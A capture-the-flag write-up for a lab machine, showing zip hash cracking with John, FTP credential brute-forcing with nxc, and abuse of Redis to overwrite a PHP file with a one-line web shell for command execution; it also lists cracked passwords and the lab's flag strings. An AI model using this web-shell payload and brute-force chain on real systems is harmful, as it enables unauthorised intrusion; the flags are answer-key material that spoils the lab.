THIS IS A LONG FLAG

# Flag 1
Access the NFS Share, and attempt to crack the `untitled.xlsx.zip` file using `zip2john > hash.txt` then use `john hash.txt`. The password will be cracked and use `7z -x untitled.xlsx.zip` to unzip it. To view the `.xlsx` file you can use online web viewer, a hidden text in white font color will be shown these are a list of passwords to crack with the FTP.

untitled.xlsx.zip:NCC-1701

The NFS share is vulnerable to root escape. Enumerate the users in the system using `nxc nfs 10.129.120.56 -u '' -p '' --ls '/'`. Then collect all the usernames and bruteforce the FTP using `nxc ftp 10.129.120.56 -u users.txt -p passwords.txt`.

Use the credentials to login on FTP then get the flag
```
NCCGroupManila{FTP_1nIt!@l_
```

# Flag 2
When you try to login on the redis cli with `redis-cli` it requires authentication. So we just need to find the credentials in order to execute some attack vectors. Go back to the ftp server there is a directory named `c` and a file inside it, the creds for the redis user is there.

Now login to the redis with `redis-cli -h 10.129.120.56 -a <password>`. After a successful login, the common attack vector to gain a command injection RCE which is from this link: [Redis Post Exploitation Shell](https://hackviser.com/tactics/pentesting/services/redis#post-exploitation) is not effective because doing a `config set dbfilename shell.php` is not applicable due to a protection mode, meaning we cannot execute configs such as `dbfilename` or `dir`. So... what if there is already a `dbfilename` and a `dir` in the system?

We need to enumerate it with `CONFIG GET *` this will read through all the configuration parameters. This includes the `dbfilename` set and the `dir`. You will notice there's a `H4rdToGuessdump1298fd.php` already existing and a `/var/www/html` as the directory. Meaning, if we try to access its website in port 80, although it's just a blank page the `.php` file is accessible by `http://10.129.120.56/H4rdToGuessdump1298fd.php` some weird characters will appear but we can change this vulnerability to get an command injection RCE

Going back to `redis-cli` we must modify the existing `.php` file so that we can access it as a shell. Execute the following:
```bash
flushall
set shell '<?php system($_REQUEST["cmd"]); ?>'
save
```
If you access the link I gave earlier, you'll notice we skipped two steps then save the configuration. This is because, the moment we modify it with `set` it modified the existing `.php` file in the system. 

`N0t_So_S#cUR3!_P@ssw0rd`

Then we go back to the website and accessed the file again with `http://10.129.120.56/H4rdToGuessdump1298fd.php?cmd=whoami`. Then, establish a reverse shell using busybox 
(NOTE: For this specific scenario this is an internal lab so a staging machine is used in order to have an outbound connection and establish a shell).
Once we establish a shell get the flag

```
R3d1s_ch4in3d_t0_RC3_
```

# Flag 3
```
4lwAys_ch3ck_1nt3rN4l_ports
```
# Flag 4
This is found when you mount the NFS share
```txt
_N33d_f0r_sh4r3
```


# Flag 5
```
_f3uG0_Wr!t3_Exploit
```

# Flag 6
```
H1gh3ST_Pr1vs}
```